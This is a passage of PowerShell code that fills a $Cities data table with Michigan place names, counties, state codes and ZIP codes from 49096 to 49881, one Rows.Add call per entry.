$Cities.Rows.Add("Vermontville","Eaton","Michigan","MI","26","49096") + $null = $Cities.Rows.Add("Vicksburg","Kalamazoo","Michigan","MI","26","49097") + $null = $Cities.Rows.Add("Watervliet","Berrien","Michigan","MI","26","49098") + $null = $Cities.Rows.Add("White pigeon","St. Joseph","Michigan","MI","26","49099") + $null = $Cities.Rows.Add("Zcta 490hh","Allegan","Michigan","MI","26","490HH") + $null = $Cities.Rows.Add("Baroda","Berrien","Michigan","MI","26","49101") + $null = $Cities.Rows.Add("Berrien center","Berrien","Michigan","MI","26","49102") + $null = $Cities.Rows.Add("Berrien springs","Berrien","Michigan","MI","26","49103") + $null = $Cities.Rows.Add("Bridgman","Berrien","Michigan","MI","26","49106") + $null = $Cities.Rows.Add("Buchanan","Berrien","Michigan","MI","26","49107") + $null = $Cities.Rows.Add("Eau claire","Berrien","Michigan","MI","26","49111") + $null = $Cities.Rows.Add("Edwardsburg","Cass","Michigan","MI","26","49112") + $null = $Cities.Rows.Add("Galien","Berrien","Michigan","MI","26","49113") + $null = $Cities.Rows.Add("Harbert","Berrien","Michigan","MI","26","49115") + $null = $Cities.Rows.Add("Lakeside","Berrien","Michigan","MI","26","49116") + $null = $Cities.Rows.Add("Grand beach","Berrien","Michigan","MI","26","49117") + $null = $Cities.Rows.Add("New troy","Berrien","Michigan","MI","26","49119") + $null = $Cities.Rows.Add("Niles","Berrien","Michigan","MI","26","49120") + $null = $Cities.Rows.Add("Sawyer","Berrien","Michigan","MI","26","49125") + $null = $Cities.Rows.Add("Sodus","Berrien","Michigan","MI","26","49126") + $null = $Cities.Rows.Add("Stevensville","Berrien","Michigan","MI","26","49127") + $null = $Cities.Rows.Add("Three oaks","Berrien","Michigan","MI","26","49128") + $null = $Cities.Rows.Add("Union pier","Berrien","Michigan","MI","26","49129") + $null = $Cities.Rows.Add("Union","Cass","Michigan","MI","26","49130") + $null = $Cities.Rows.Add("Zcta 491hh","Berrien","Michigan","MI","26","491HH") + $null = $Cities.Rows.Add("Jackson","Jackson","Michigan","MI","26","49201") + $null = $Cities.Rows.Add("Jackson","Jackson","Michigan","MI","26","49202") + $null = $Cities.Rows.Add("Jackson","Jackson","Michigan","MI","26","49203") + $null = $Cities.Rows.Add("Addison","Lenawee","Michigan","MI","26","49220") + $null = $Cities.Rows.Add("Adrian","Lenawee","Michigan","MI","26","49221") + $null = $Cities.Rows.Add("Albion","Calhoun","Michigan","MI","26","49224") + $null = $Cities.Rows.Add("Allen","Hillsdale","Michigan","MI","26","49227") + $null = $Cities.Rows.Add("Blissfield","Lenawee","Michigan","MI","26","49228") + $null = $Cities.Rows.Add("Britton","Lenawee","Michigan","MI","26","49229") + $null = $Cities.Rows.Add("Brooklyn","Jackson","Michigan","MI","26","49230") + $null = $Cities.Rows.Add("Camden","Hillsdale","Michigan","MI","26","49232") + $null = $Cities.Rows.Add("Cement city","Lenawee","Michigan","MI","26","49233") + $null = $Cities.Rows.Add("Clarklake","Jackson","Michigan","MI","26","49234") + $null = $Cities.Rows.Add("Clayton","Lenawee","Michigan","MI","26","49235") + $null = $Cities.Rows.Add("Clinton","Lenawee","Michigan","MI","26","49236") + $null = $Cities.Rows.Add("Concord","Jackson","Michigan","MI","26","49237") + $null = $Cities.Rows.Add("Deerfield","Lenawee","Michigan","MI","26","49238") + $null = $Cities.Rows.Add("Grass lake","Jackson","Michigan","MI","26","49240") + $null = $Cities.Rows.Add("Hanover","Jackson","Michigan","MI","26","49241") + $null = $Cities.Rows.Add("Hillsdale","Hillsdale","Michigan","MI","26","49242") + $null = $Cities.Rows.Add("Homer","Calhoun","Michigan","MI","26","49245") + $null = $Cities.Rows.Add("Horton","Jackson","Michigan","MI","26","49246") + $null = $Cities.Rows.Add("Hudson","Lenawee","Michigan","MI","26","49247") + $null = $Cities.Rows.Add("Jasper","Lenawee","Michigan","MI","26","49248") + $null = $Cities.Rows.Add("Jerome","Hillsdale","Michigan","MI","26","49249") + $null = $Cities.Rows.Add("Jonesville","Hillsdale","Michigan","MI","26","49250") + $null = $Cities.Rows.Add("Leslie","Ingham","Michigan","MI","26","49251") + $null = $Cities.Rows.Add("Litchfield","Hillsdale","Michigan","MI","26","49252") + $null = $Cities.Rows.Add("Manitou beach","Lenawee","Michigan","MI","26","49253") + $null = $Cities.Rows.Add("Michigan center","Jackson","Michigan","MI","26","49254") + $null = $Cities.Rows.Add("Montgomery","Branch","Michigan","MI","26","49255") + $null = $Cities.Rows.Add("Morenci","Lenawee","Michigan","MI","26","49256") + $null = $Cities.Rows.Add("Munith","Jackson","Michigan","MI","26","49259") + $null = $Cities.Rows.Add("North adams","Hillsdale","Michigan","MI","26","49262") + $null = $Cities.Rows.Add("Norvell","Jackson","Michigan","MI","26","49263") + $null = $Cities.Rows.Add("Onondaga","Ingham","Michigan","MI","26","49264") + $null = $Cities.Rows.Add("Onsted","Lenawee","Michigan","MI","26","49265") + $null = $Cities.Rows.Add("Osseo","Hillsdale","Michigan","MI","26","49266") + $null = $Cities.Rows.Add("Ottawa lake","Monroe","Michigan","MI","26","49267") + $null = $Cities.Rows.Add("Palmyra","Lenawee","Michigan","MI","26","49268") + $null = $Cities.Rows.Add("Parma","Jackson","Michigan","MI","26","49269") + $null = $Cities.Rows.Add("Petersburg","Monroe","Michigan","MI","26","49270") + $null = $Cities.Rows.Add("Pittsford","Hillsdale","Michigan","MI","26","49271") + $null = $Cities.Rows.Add("Pleasant lake","Jackson","Michigan","MI","26","49272") + $null = $Cities.Rows.Add("Reading","Hillsdale","Michigan","MI","26","49274") + $null = $Cities.Rows.Add("Riga","Lenawee","Michigan","MI","26","49276") + $null = $Cities.Rows.Add("Rives junction","Jackson","Michigan","MI","26","49277") + $null = $Cities.Rows.Add("Sand creek","Lenawee","Michigan","MI","26","49279") + $null = $Cities.Rows.Add("Somerset","Hillsdale","Michigan","MI","26","49281") + $null = $Cities.Rows.Add("Somerset center","Hillsdale","Michigan","MI","26","49282") + $null = $Cities.Rows.Add("Spring arbor","Jackson","Michigan","MI","26","49283") + $null = $Cities.Rows.Add("Springport","Jackson","Michigan","MI","26","49284") + $null = $Cities.Rows.Add("Stockbridge","Ingham","Michigan","MI","26","49285") + $null = $Cities.Rows.Add("Tecumseh","Lenawee","Michigan","MI","26","49286") + $null = $Cities.Rows.Add("Tipton","Lenawee","Michigan","MI","26","49287") + $null = $Cities.Rows.Add("Waldron","Hillsdale","Michigan","MI","26","49288") + $null = $Cities.Rows.Add("Weston","Lenawee","Michigan","MI","26","49289") + $null = $Cities.Rows.Add("Zcta 492hh","Calhoun","Michigan","MI","26","492HH") + $null = $Cities.Rows.Add("Ada","Kent","Michigan","MI","26","49301") + $null = $Cities.Rows.Add("Alto","Kent","Michigan","MI","26","49302") + $null = $Cities.Rows.Add("Bailey","Muskegon","Michigan","MI","26","49303") + $null = $Cities.Rows.Add("Baldwin","Lake","Michigan","MI","26","49304") + $null = $Cities.Rows.Add("Barryton","Mecosta","Michigan","MI","26","49305") + $null = $Cities.Rows.Add("Belmont","Kent","Michigan","MI","26","49306") + $null = $Cities.Rows.Add("Big rapids","Mecosta","Michigan","MI","26","49307") + $null = $Cities.Rows.Add("Bitely","Newaygo","Michigan","MI","26","49309") + $null = $Cities.Rows.Add("Blanchard","Isabella","Michigan","MI","26","49310") + $null = $Cities.Rows.Add("Brohman","Newaygo","Michigan","MI","26","49312") + $null = $Cities.Rows.Add("Byron center","Kent","Michigan","MI","26","49315") + $null = $Cities.Rows.Add("Dutton","Kent","Michigan","MI","26","49316") + $null = $Cities.Rows.Add("Casnovia","Muskegon","Michigan","MI","26","49318") + $null = $Cities.Rows.Add("Cedar springs","Kent","Michigan","MI","26","49319") + $null = $Cities.Rows.Add("Comstock park","Kent","Michigan","MI","26","49321") + $null = $Cities.Rows.Add("Coral","Montcalm","Michigan","MI","26","49322") + $null = $Cities.Rows.Add("Dorr","Allegan","Michigan","MI","26","49323") + $null = $Cities.Rows.Add("Freeport","Barry","Michigan","MI","26","49325") + $null = $Cities.Rows.Add("Gowen","Kent","Michigan","MI","26","49326") + $null = $Cities.Rows.Add("Grant","Newaygo","Michigan","MI","26","49327") + $null = $Cities.Rows.Add("Hopkins","Allegan","Michigan","MI","26","49328") + $null = $Cities.Rows.Add("Howard city","Montcalm","Michigan","MI","26","49329") + $null = $Cities.Rows.Add("Kent city","Kent","Michigan","MI","26","49330") + $null = $Cities.Rows.Add("Lowell","Kent","Michigan","MI","26","49331") + $null = $Cities.Rows.Add("Mecosta","Mecosta","Michigan","MI","26","49332") + $null = $Cities.Rows.Add("Middleville","Barry","Michigan","MI","26","49333") + $null = $Cities.Rows.Add("Moline","Allegan","Michigan","MI","26","49335") + $null = $Cities.Rows.Add("Morley","Mecosta","Michigan","MI","26","49336") + $null = $Cities.Rows.Add("Newaygo","Newaygo","Michigan","MI","26","49337") + $null = $Cities.Rows.Add("Paris","Mecosta","Michigan","MI","26","49338") + $null = $Cities.Rows.Add("Pierson","Montcalm","Michigan","MI","26","49339") + $null = $Cities.Rows.Add("Remus","Mecosta","Michigan","MI","26","49340") + $null = $Cities.Rows.Add("Rockford","Kent","Michigan","MI","26","49341") + $null = $Cities.Rows.Add("Rodney","Mecosta","Michigan","MI","26","49342") + $null = $Cities.Rows.Add("Sand lake","Kent","Michigan","MI","26","49343") + $null = $Cities.Rows.Add("Shelbyville","Allegan","Michigan","MI","26","49344") + $null = $Cities.Rows.Add("Sparta","Kent","Michigan","MI","26","49345") + $null = $Cities.Rows.Add("Stanwood","Mecosta","Michigan","MI","26","49346") + $null = $Cities.Rows.Add("Trufant","Montcalm","Michigan","MI","26","49347") + $null = $Cities.Rows.Add("Wayland","Allegan","Michigan","MI","26","49348") + $null = $Cities.Rows.Add("White cloud","Newaygo","Michigan","MI","26","49349") + $null = $Cities.Rows.Add("Zcta 493hh","Allegan","Michigan","MI","26","493HH") + $null = $Cities.Rows.Add("Allendale","Ottawa","Michigan","MI","26","49401") + $null = $Cities.Rows.Add("Branch","Mason","Michigan","MI","26","49402") + $null = $Cities.Rows.Add("Conklin","Ottawa","Michigan","MI","26","49403") + $null = $Cities.Rows.Add("Coopersville","Ottawa","Michigan","MI","26","49404") + $null = $Cities.Rows.Add("Custer","Mason","Michigan","MI","26","49405") + $null = $Cities.Rows.Add("Douglas","Allegan","Michigan","MI","26","49406") + $null = $Cities.Rows.Add("Fennville","Allegan","Michigan","MI","26","49408") + $null = $Cities.Rows.Add("Fountain","Mason","Michigan","MI","26","49410") + $null = $Cities.Rows.Add("Free soil","Mason","Michigan","MI","26","49411") + $null = $Cities.Rows.Add("Fremont","Newaygo","Michigan","MI","26","49412") + $null = $Cities.Rows.Add("Fruitport","Muskegon","Michigan","MI","26","49415") + $null = $Cities.Rows.Add("Grand haven","Ottawa","Michigan","MI","26","49417") + $null = $Cities.Rows.Add("Grandville","Kent","Michigan","MI","26","49418") + $null = $Cities.Rows.Add("Hamilton","Allegan","Michigan","MI","26","49419") + $null = $Cities.Rows.Add("Hart","Oceana","Michigan","MI","26","49420") + $null = $Cities.Rows.Add("Hesperia","Oceana","Michigan","MI","26","49421") + $null = $Cities.Rows.Add("Holland","Ottawa","Michigan","MI","26","49423") + $null = $Cities.Rows.Add("Holland","Ottawa","Michigan","MI","26","49424") + $null = $Cities.Rows.Add("Holton","Muskegon","Michigan","MI","26","49425") + $null = $Cities.Rows.Add("Hudsonville","Ottawa","Michigan","MI","26","49426") + $null = $Cities.Rows.Add("Jenison","Ottawa","Michigan","MI","26","49428") + $null = $Cities.Rows.Add("Ludington","Mason","Michigan","MI","26","49431") + $null = $Cities.Rows.Add("Macatawa","Ottawa","Michigan","MI","26","49434") + $null = $Cities.Rows.Add("Marne","Ottawa","Michigan","MI","26","49435") + $null = $Cities.Rows.Add("Mears","Oceana","Michigan","MI","26","49436") + $null = $Cities.Rows.Add("Montague","Muskegon","Michigan","MI","26","49437") + $null = $Cities.Rows.Add("Muskegon","Muskegon","Michigan","MI","26","49440") + $null = $Cities.Rows.Add("Muskegon","Muskegon","Michigan","MI","26","49441") + $null = $Cities.Rows.Add("Muskegon","Muskegon","Michigan","MI","26","49442") + $null = $Cities.Rows.Add("Muskegon heights","Muskegon","Michigan","MI","26","49444") + $null = $Cities.Rows.Add("North muskegon","Muskegon","Michigan","MI","26","49445") + $null = $Cities.Rows.Add("New era","Oceana","Michigan","MI","26","49446") + $null = $Cities.Rows.Add("Nunica","Ottawa","Michigan","MI","26","49448") + $null = $Cities.Rows.Add("Pentwater","Oceana","Michigan","MI","26","49449") + $null = $Cities.Rows.Add("Pullman","Allegan","Michigan","MI","26","49450") + $null = $Cities.Rows.Add("Ravenna","Muskegon","Michigan","MI","26","49451") + $null = $Cities.Rows.Add("Rothbury","Oceana","Michigan","MI","26","49452") + $null = $Cities.Rows.Add("Saugatuck","Allegan","Michigan","MI","26","49453") + $null = $Cities.Rows.Add("Scottville","Mason","Michigan","MI","26","49454") + $null = $Cities.Rows.Add("Shelby","Oceana","Michigan","MI","26","49455") + $null = $Cities.Rows.Add("Spring lake","Ottawa","Michigan","MI","26","49456") + $null = $Cities.Rows.Add("Twin lake","Muskegon","Michigan","MI","26","49457") + $null = $Cities.Rows.Add("Walhalla","Mason","Michigan","MI","26","49458") + $null = $Cities.Rows.Add("Walkerville","Oceana","Michigan","MI","26","49459") + $null = $Cities.Rows.Add("West olive","Ottawa","Michigan","MI","26","49460") + $null = $Cities.Rows.Add("Whitehall","Muskegon","Michigan","MI","26","49461") + $null = $Cities.Rows.Add("Zeeland","Ottawa","Michigan","MI","26","49464") + $null = $Cities.Rows.Add("Zcta 494hh","Allegan","Michigan","MI","26","494HH") + $null = $Cities.Rows.Add("Grand rapids","Kent","Michigan","MI","26","49503") + $null = $Cities.Rows.Add("Walker","Kent","Michigan","MI","26","49504") + $null = $Cities.Rows.Add("Grand rapids","Kent","Michigan","MI","26","49505") + $null = $Cities.Rows.Add("Grand rapids","Kent","Michigan","MI","26","49506") + $null = $Cities.Rows.Add("Grand rapids","Kent","Michigan","MI","26","49507") + $null = $Cities.Rows.Add("Kentwood","Kent","Michigan","MI","26","49508") + $null = $Cities.Rows.Add("Wyoming","Kent","Michigan","MI","26","49509") + $null = $Cities.Rows.Add("Kentwood","Kent","Michigan","MI","26","49512") + $null = $Cities.Rows.Add("Zcta 49525","Kent","Michigan","MI","26","49525") + $null = $Cities.Rows.Add("Zcta 49544","Kent","Michigan","MI","26","49544") + $null = $Cities.Rows.Add("Grand rapids","Kent","Michigan","MI","26","49546") + $null = $Cities.Rows.Add("Kentwood","Kent","Michigan","MI","26","49548") + $null = $Cities.Rows.Add("Zcta 495hh","Kent","Michigan","MI","26","495HH") + $null = $Cities.Rows.Add("Cadillac","Wexford","Michigan","MI","26","49601") + $null = $Cities.Rows.Add("Alba","Antrim","Michigan","MI","26","49611") + $null = $Cities.Rows.Add("Alden","Antrim","Michigan","MI","26","49612") + $null = $Cities.Rows.Add("Arcadia","Manistee","Michigan","MI","26","49613") + $null = $Cities.Rows.Add("Bear lake","Manistee","Michigan","MI","26","49614") + $null = $Cities.Rows.Add("Bellaire","Antrim","Michigan","MI","26","49615") + $null = $Cities.Rows.Add("Benzonia","Benzie","Michigan","MI","26","49616") + $null = $Cities.Rows.Add("Beulah","Benzie","Michigan","MI","26","49617") + $null = $Cities.Rows.Add("Boon","Wexford","Michigan","MI","26","49618") + $null = $Cities.Rows.Add("Brethren","Manistee","Michigan","MI","26","49619") + $null = $Cities.Rows.Add("Buckley","Wexford","Michigan","MI","26","49620") + $null = $Cities.Rows.Add("Cedar","Leelanau","Michigan","MI","26","49621") + $null = $Cities.Rows.Add("Central lake","Antrim","Michigan","MI","26","49622") + $null = $Cities.Rows.Add("Chase","Lake","Michigan","MI","26","49623") + $null = $Cities.Rows.Add("Copemish","Manistee","Michigan","MI","26","49625") + $null = $Cities.Rows.Add("Eastlake","Manistee","Michigan","MI","26","49626") + $null = $Cities.Rows.Add("Eastport","Antrim","Michigan","MI","26","49627") + $null = $Cities.Rows.Add("Elberta","Benzie","Michigan","MI","26","49628") + $null = $Cities.Rows.Add("Elk rapids","Antrim","Michigan","MI","26","49629") + $null = $Cities.Rows.Add("Empire","Leelanau","Michigan","MI","26","49630") + $null = $Cities.Rows.Add("Evart","Osceola","Michigan","MI","26","49631") + $null = $Cities.Rows.Add("Falmouth","Missaukee","Michigan","MI","26","49632") + $null = $Cities.Rows.Add("Fife lake","Kalkaska","Michigan","MI","26","49633") + $null = $Cities.Rows.Add("Filer city","Manistee","Michigan","MI","26","49634") + $null = $Cities.Rows.Add("Frankfort","Benzie","Michigan","MI","26","49635") + $null = $Cities.Rows.Add("Glen arbor","Leelanau","Michigan","MI","26","49636") + $null = $Cities.Rows.Add("Grawn","Grand Traverse","Michigan","MI","26","49637") + $null = $Cities.Rows.Add("Harrietta","Wexford","Michigan","MI","26","49638") + $null = $Cities.Rows.Add("Hersey","Osceola","Michigan","MI","26","49639") + $null = $Cities.Rows.Add("Honor","Benzie","Michigan","MI","26","49640") + $null = $Cities.Rows.Add("Idlewild","Lake","Michigan","MI","26","49642") + $null = $Cities.Rows.Add("Interlochen","Grand Traverse","Michigan","MI","26","49643") + $null = $Cities.Rows.Add("Irons","Lake","Michigan","MI","26","49644") + $null = $Cities.Rows.Add("Kaleva","Manistee","Michigan","MI","26","49645") + $null = $Cities.Rows.Add("Kalkaska","Kalkaska","Michigan","MI","26","49646") + $null = $Cities.Rows.Add("Kewadin","Antrim","Michigan","MI","26","49648") + $null = $Cities.Rows.Add("Kingsley","Grand Traverse","Michigan","MI","26","49649") + $null = $Cities.Rows.Add("Lake ann","Benzie","Michigan","MI","26","49650") + $null = $Cities.Rows.Add("Moorestown","Missaukee","Michigan","MI","26","49651") + $null = $Cities.Rows.Add("Lake leelanau","Leelanau","Michigan","MI","26","49653") + $null = $Cities.Rows.Add("Leland","Leelanau","Michigan","MI","26","49654") + $null = $Cities.Rows.Add("Leroy","Osceola","Michigan","MI","26","49655") + $null = $Cities.Rows.Add("Luther","Lake","Michigan","MI","26","49656") + $null = $Cities.Rows.Add("Mc bain","Missaukee","Michigan","MI","26","49657") + $null = $Cities.Rows.Add("Mancelona","Antrim","Michigan","MI","26","49659") + $null = $Cities.Rows.Add("Stronach","Manistee","Michigan","MI","26","49660") + $null = $Cities.Rows.Add("Manton","Wexford","Michigan","MI","26","49663") + $null = $Cities.Rows.Add("Maple city","Leelanau","Michigan","MI","26","49664") + $null = $Cities.Rows.Add("Marion","Osceola","Michigan","MI","26","49665") + $null = $Cities.Rows.Add("Mayfield","Grand Traverse","Michigan","MI","26","49666") + $null = $Cities.Rows.Add("Merritt","Missaukee","Michigan","MI","26","49667") + $null = $Cities.Rows.Add("Mesick","Wexford","Michigan","MI","26","49668") + $null = $Cities.Rows.Add("Northport","Leelanau","Michigan","MI","26","49670") + $null = $Cities.Rows.Add("Onekama","Manistee","Michigan","MI","26","49675") + $null = $Cities.Rows.Add("Rapid city","Kalkaska","Michigan","MI","26","49676") + $null = $Cities.Rows.Add("Reed city","Osceola","Michigan","MI","26","49677") + $null = $Cities.Rows.Add("Sears","Osceola","Michigan","MI","26","49679") + $null = $Cities.Rows.Add("South boardman","Kalkaska","Michigan","MI","26","49680") + $null = $Cities.Rows.Add("Suttons bay","Leelanau","Michigan","MI","26","49682") + $null = $Cities.Rows.Add("Thompsonville","Benzie","Michigan","MI","26","49683") + $null = $Cities.Rows.Add("Traverse city","Grand Traverse","Michigan","MI","26","49684") + $null = $Cities.Rows.Add("Zcta 49686","Grand Traverse","Michigan","MI","26","49686") + $null = $Cities.Rows.Add("Tustin","Osceola","Michigan","MI","26","49688") + $null = $Cities.Rows.Add("Wellston","Manistee","Michigan","MI","26","49689") + $null = $Cities.Rows.Add("Williamsburg","Grand Traverse","Michigan","MI","26","49690") + $null = $Cities.Rows.Add("Zcta 496hh","Antrim","Michigan","MI","26","496HH") + $null = $Cities.Rows.Add("Mackinaw city","Cheboygan","Michigan","MI","26","49701") + $null = $Cities.Rows.Add("Afton","Cheboygan","Michigan","MI","26","49705") + $null = $Cities.Rows.Add("Alanson","Emmet","Michigan","MI","26","49706") + $null = $Cities.Rows.Add("Alpena","Alpena","Michigan","MI","26","49707") + $null = $Cities.Rows.Add("Atlanta","Montmorency","Michigan","MI","26","49709") + $null = $Cities.Rows.Add("Barbeau","Chippewa","Michigan","MI","26","49710") + $null = $Cities.Rows.Add("Boyne city","Charlevoix","Michigan","MI","26","49712") + $null = $Cities.Rows.Add("Boyne falls","Charlevoix","Michigan","MI","26","49713") + $null = $Cities.Rows.Add("Raco","Chippewa","Michigan","MI","26","49715") + $null = $Cities.Rows.Add("Brutus","Emmet","Michigan","MI","26","49716") + $null = $Cities.Rows.Add("Carp lake","Emmet","Michigan","MI","26","49718") + $null = $Cities.Rows.Add("Cedarville","Mackinac","Michigan","MI","26","49719") + $null = $Cities.Rows.Add("Charlevoix","Charlevoix","Michigan","MI","26","49720") + $null = $Cities.Rows.Add("Cheboygan","Cheboygan","Michigan","MI","26","49721") + $null = $Cities.Rows.Add("Conway","Emmet","Michigan","MI","26","49722") + $null = $Cities.Rows.Add("Dafter","Chippewa","Michigan","MI","26","49724") + $null = $Cities.Rows.Add("De tour village","Chippewa","Michigan","MI","26","49725") + $null = $Cities.Rows.Add("Drummond island","Chippewa","Michigan","MI","26","49726") + $null = $Cities.Rows.Add("East jordan","Charlevoix","Michigan","MI","26","49727") + $null = $Cities.Rows.Add("Eckerman","Chippewa","Michigan","MI","26","49728") + $null = $Cities.Rows.Add("Ellsworth","Antrim","Michigan","MI","26","49729") + $null = $Cities.Rows.Add("Elmira","Antrim","Michigan","MI","26","49730") + $null = $Cities.Rows.Add("Frederic","Crawford","Michigan","MI","26","49733") + $null = $Cities.Rows.Add("Gaylord","Otsego","Michigan","MI","26","49735") + $null = $Cities.Rows.Add("Goetzville","Chippewa","Michigan","MI","26","49736") + $null = $Cities.Rows.Add("Grayling","Crawford","Michigan","MI","26","49738") + $null = $Cities.Rows.Add("Harbor point","Emmet","Michigan","MI","26","49740") + $null = $Cities.Rows.Add("Hawks","Presque Isle","Michigan","MI","26","49743") + $null = $Cities.Rows.Add("Herron","Alpena","Michigan","MI","26","49744") + $null = $Cities.Rows.Add("Hessel","Mackinac","Michigan","MI","26","49745") + $null = $Cities.Rows.Add("Hillman","Montmorency","Michigan","MI","26","49746") + $null = $Cities.Rows.Add("Hubbard lake","Alpena","Michigan","MI","26","49747") + $null = $Cities.Rows.Add("Hulbert","Chippewa","Michigan","MI","26","49748") + $null = $Cities.Rows.Add("Indian river","Cheboygan","Michigan","MI","26","49749") + $null = $Cities.Rows.Add("Johannesburg","Otsego","Michigan","MI","26","49751") + $null = $Cities.Rows.Add("Kinross","Chippewa","Michigan","MI","26","49752") + $null = $Cities.Rows.Add("Lachine","Alpena","Michigan","MI","26","49753") + $null = $Cities.Rows.Add("Levering","Emmet","Michigan","MI","26","49755") + $null = $Cities.Rows.Add("Lewiston","Montmorency","Michigan","MI","26","49756") + $null = $Cities.Rows.Add("Mackinac island","Mackinac","Michigan","MI","26","49757") + $null = $Cities.Rows.Add("Millersburg","Presque Isle","Michigan","MI","26","49759") + $null = $Cities.Rows.Add("Moran","Mackinac","Michigan","MI","26","49760") + $null = $Cities.Rows.Add("Mullett lake","Cheboygan","Michigan","MI","26","49761") + $null = $Cities.Rows.Add("Naubinway","Mackinac","Michigan","MI","26","49762") + $null = $Cities.Rows.Add("Oden","Emmet","Michigan","MI","26","49764") + $null = $Cities.Rows.Add("Onaway","Presque Isle","Michigan","MI","26","49765") + $null = $Cities.Rows.Add("Ossineke","Alpena","Michigan","MI","26","49766") + $null = $Cities.Rows.Add("Paradise","Chippewa","Michigan","MI","26","49768") + $null = $Cities.Rows.Add("Pellston","Emmet","Michigan","MI","26","49769") + $null = $Cities.Rows.Add("Bay view","Emmet","Michigan","MI","26","49770") + $null = $Cities.Rows.Add("Pickford","Chippewa","Michigan","MI","26","49774") + $null = $Cities.Rows.Add("Pointe aux pins","Mackinac","Michigan","MI","26","49775") + $null = $Cities.Rows.Add("Posen","Presque Isle","Michigan","MI","26","49776") + $null = $Cities.Rows.Add("Presque isle","Presque Isle","Michigan","MI","26","49777") + $null = $Cities.Rows.Add("Rogers city","Presque Isle","Michigan","MI","26","49779") + $null = $Cities.Rows.Add("Fibre","Chippewa","Michigan","MI","26","49780") + $null = $Cities.Rows.Add("Saint ignace","Mackinac","Michigan","MI","26","49781") + $null = $Cities.Rows.Add("Saint james","Charlevoix","Michigan","MI","26","49782") + $null = $Cities.Rows.Add("Sault sainte mar","Chippewa","Michigan","MI","26","49783") + $null = $Cities.Rows.Add("Kincheloe","Chippewa","Michigan","MI","26","49788") + $null = $Cities.Rows.Add("Topinabee","Cheboygan","Michigan","MI","26","49791") + $null = $Cities.Rows.Add("Tower","Cheboygan","Michigan","MI","26","49792") + $null = $Cities.Rows.Add("Trout lake","Chippewa","Michigan","MI","26","49793") + $null = $Cities.Rows.Add("Vanderbilt","Otsego","Michigan","MI","26","49795") + $null = $Cities.Rows.Add("Walloon lake","Charlevoix","Michigan","MI","26","49796") + $null = $Cities.Rows.Add("Wolverine","Cheboygan","Michigan","MI","26","49799") + $null = $Cities.Rows.Add("Zcta 497hh","Alcona","Michigan","MI","26","497HH") + $null = $Cities.Rows.Add("Zcta 497xx","Cheboygan","Michigan","MI","26","497XX") + $null = $Cities.Rows.Add("Iron mountain","Dickinson","Michigan","MI","26","49801") + $null = $Cities.Rows.Add("Iron mountain","Dickinson","Michigan","MI","26","49802") + $null = $Cities.Rows.Add("Allouez","Keweenaw","Michigan","MI","26","49805") + $null = $Cities.Rows.Add("Au train","Alger","Michigan","MI","26","49806") + $null = $Cities.Rows.Add("Hardwood","Delta","Michigan","MI","26","49807") + $null = $Cities.Rows.Add("Big bay","Marquette","Michigan","MI","26","49808") + $null = $Cities.Rows.Add("Carney","Menominee","Michigan","MI","26","49812") + $null = $Cities.Rows.Add("Cedar river","Menominee","Michigan","MI","26","49813") + $null = $Cities.Rows.Add("Champion","Marquette","Michigan","MI","26","49814") + $null = $Cities.Rows.Add("Channing","Dickinson","Michigan","MI","26","49815") + $null = $Cities.Rows.Add("Limestone","Alger","Michigan","MI","26","49816") + $null = $Cities.Rows.Add("Cooks","Schoolcraft","Michigan","MI","26","49817") + $null = $Cities.Rows.Add("Cornell","Delta","Michigan","MI","26","49818") + $null = $Cities.Rows.Add("Curtis","Mackinac","Michigan","MI","26","49820") + $null = $Cities.Rows.Add("Daggett","Menominee","Michigan","MI","26","49821") + $null = $Cities.Rows.Add("Deerton","Alger","Michigan","MI","26","49822") + $null = $Cities.Rows.Add("Eben junction","Alger","Michigan","MI","26","49825") + $null = $Cities.Rows.Add("Rumely","Alger","Michigan","MI","26","49826") + $null = $Cities.Rows.Add("Engadine","Mackinac","Michigan","MI","26","49827") + $null = $Cities.Rows.Add("Escanaba","Delta","Michigan","MI","26","49829") + $null = $Cities.Rows.Add("Felch","Dickinson","Michigan","MI","26","49831") + $null = $Cities.Rows.Add("Little lake","Marquette","Michigan","MI","26","49833") + $null = $Cities.Rows.Add("Foster city","Dickinson","Michigan","MI","26","49834") + $null = $Cities.Rows.Add("Garden","Delta","Michigan","MI","26","49835") + $null = $Cities.Rows.Add("Germfask","Schoolcraft","Michigan","MI","26","49836") + $null = $Cities.Rows.Add("Brampton","Delta","Michigan","MI","26","49837") + $null = $Cities.Rows.Add("Gould city","Mackinac","Michigan","MI","26","49838") + $null = $Cities.Rows.Add("Grand marais","Alger","Michigan","MI","26","49839") + $null = $Cities.Rows.Add("Gulliver","Schoolcraft","Michigan","MI","26","49840") + $null = $Cities.Rows.Add("Princeton","Marquette","Michigan","MI","26","49841") + $null = $Cities.Rows.Add("Hermansville","Menominee","Michigan","MI","26","49847") + $null = $Cities.Rows.Add("Ingalls","Menominee","Michigan","MI","26","49848") + $null = $Cities.Rows.Add("North lake","Marquette","Michigan","MI","26","49849") + $null = $Cities.Rows.Add("Loretto","Dickinson","Michigan","MI","26","49852") + $null = $Cities.Rows.Add("Mc millan","Luce","Michigan","MI","26","49853") + $null = $Cities.Rows.Add("Thompson","Schoolcraft","Michigan","MI","26","49854") + $null = $Cities.Rows.Add("Beaver grove","Marquette","Michigan","MI","26","49855") + $null = $Cities.Rows.Add("Menominee","Menominee","Michigan","MI","26","49858") + $null = $Cities.Rows.Add("Michigamme","Marquette","Michigan","MI","26","49861") + $null = $Cities.Rows.Add("Christmas","Alger","Michigan","MI","26","49862") + $null = $Cities.Rows.Add("Nadeau","Menominee","Michigan","MI","26","49863") + $null = $Cities.Rows.Add("Nahma","Delta","Michigan","MI","26","49864") + $null = $Cities.Rows.Add("Negaunee","Marquette","Michigan","MI","26","49866") + $null = $Cities.Rows.Add("Newberry","Luce","Michigan","MI","26","49868") + $null = $Cities.Rows.Add("Norway","Dickinson","Michigan","MI","26","49870") + $null = $Cities.Rows.Add("Palmer","Marquette","Michigan","MI","26","49871") + $null = $Cities.Rows.Add("Perkins","Delta","Michigan","MI","26","49872") + $null = $Cities.Rows.Add("Perronville","Menominee","Michigan","MI","26","49873") + $null = $Cities.Rows.Add("Powers","Menominee","Michigan","MI","26","49874") + $null = $Cities.Rows.Add("Quinnesec","Dickinson","Michigan","MI","26","49876") + $null = $Cities.Rows.Add("Ralph","Dickinson","Michigan","MI","26","49877") + $null = $Cities.Rows.Add("Rapid river","Delta","Michigan","MI","26","49878") + $null = $Cities.Rows.Add("Republic","Marquette","Michigan","MI","26","49879") + $null = $Cities.Rows.Add("Rock","Delta","Michigan","MI","26","49880") + $null = $Cities.Rows.Add("Sagola","Dickinson","Michigan","MI","26","49881") + $null = 